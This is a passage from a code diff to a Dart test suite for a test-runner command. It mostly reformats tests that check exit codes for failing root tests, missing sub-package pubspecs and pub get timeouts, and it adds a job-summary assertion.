capturedSummary; + TestResultsUtil.writeTestJobSummary( + results, + 0, + platformId: 'test-runner', + writeSummary: (m) => capturedSummary = m, + ); + expect(capturedSummary, isNotNull); + expect(capturedSummary!, contains('## Test Results — test-runner')); + expect(capturedSummary!, contains('passed')); + } + }); test('exits with code 1 when root tests fail', () async { writeRootPubspec(includeTest: true); Directory(p.join(tempDir.path, 'test')).createSync(recursive: true); - File(p.join(tempDir.path, 'test', 'failing_test.dart')).writeAsStringSync( - ''' + File(p.join(tempDir.path, 'test', 'failing_test.dart')).writeAsStringSync(''' import 'package:test/test.dart'; void main() { test('fails', () => expect(1, equals(2))); } -''', - ); +'''); - final pubGet = await Process.run('dart', [ - 'pub', - 'get', - ], workingDirectory: tempDir.path); + final pubGet = await Process.run('dart', ['pub', 'get'], workingDirectory: tempDir.path); expect(pubGet.exitCode, equals(0), reason: 'dart pub get must succeed'); await expectLater( @@ -163,32 +137,25 @@ void main() { ); }); - test( - 'exits when configured sub-package directory has no pubspec.yaml', - () async { - writeRootPubspec(); - writeSubPackageConfig([ - {'name': 'pkg_a', 'path': 'packages/pkg_a'}, - ]); - Directory( - p.join(tempDir.path, 'packages', 'pkg_a'), - ).createSync(recursive: true); - - await expectLater( - () => - TestCommand.runWithRoot(tempDir.path, exitHandler: _throwingExit), - throwsA(isA<_TestExit>().having((e) => e.code, 'code', 1)), - ); - }, - ); + test('exits when configured sub-package directory has no pubspec.yaml', () async { + writeRootPubspec(); + writeSubPackageConfig([ + {'name': 'pkg_a', 'path': 'packages/pkg_a'}, + ]); + Directory(p.join(tempDir.path, 'packages', 'pkg_a')).createSync(recursive: true); + + await expectLater( + () => TestCommand.runWithRoot(tempDir.path, exitHandler: _throwingExit), + throwsA(isA<_TestExit>().having((e) => e.code, 'code', 1)), + ); + }); test('exits when 
sub-package pub get times out', () async { writeRootPubspec(); writeSubPackageConfig([ {'name': 'pkg_timeout', 'path': 'packages/pkg_timeout'}, ]); - final pkgDir = Directory(p.join(tempDir.path, 'packages', 'pkg_timeout')) - ..createSync(recursive: true); + final pkgDir = Directory(p.join(tempDir.path, 'packages', 'pkg_timeout'))..createSync(recursive: true); File(p.join(pkgDir.path, 'pubspec.yaml')).writeAsStringSync(''' name: pkg_timeout version: 0.0.0 @@ -207,11 +174,7 @@ void main() { '''); await expectLater( - () => TestCommand.runWithRoot( - tempDir.path, - pubGetTimeout: Duration.zero, - exitHandler: _throwingExit, - ), + () => TestCommand.runWithRoot(tempDir.path, pubGetTimeout: Duration.zero, exitHandler: _throwingExit), throwsA(isA<_TestExit>().having((e) => e.code, 'code', 1)), ); });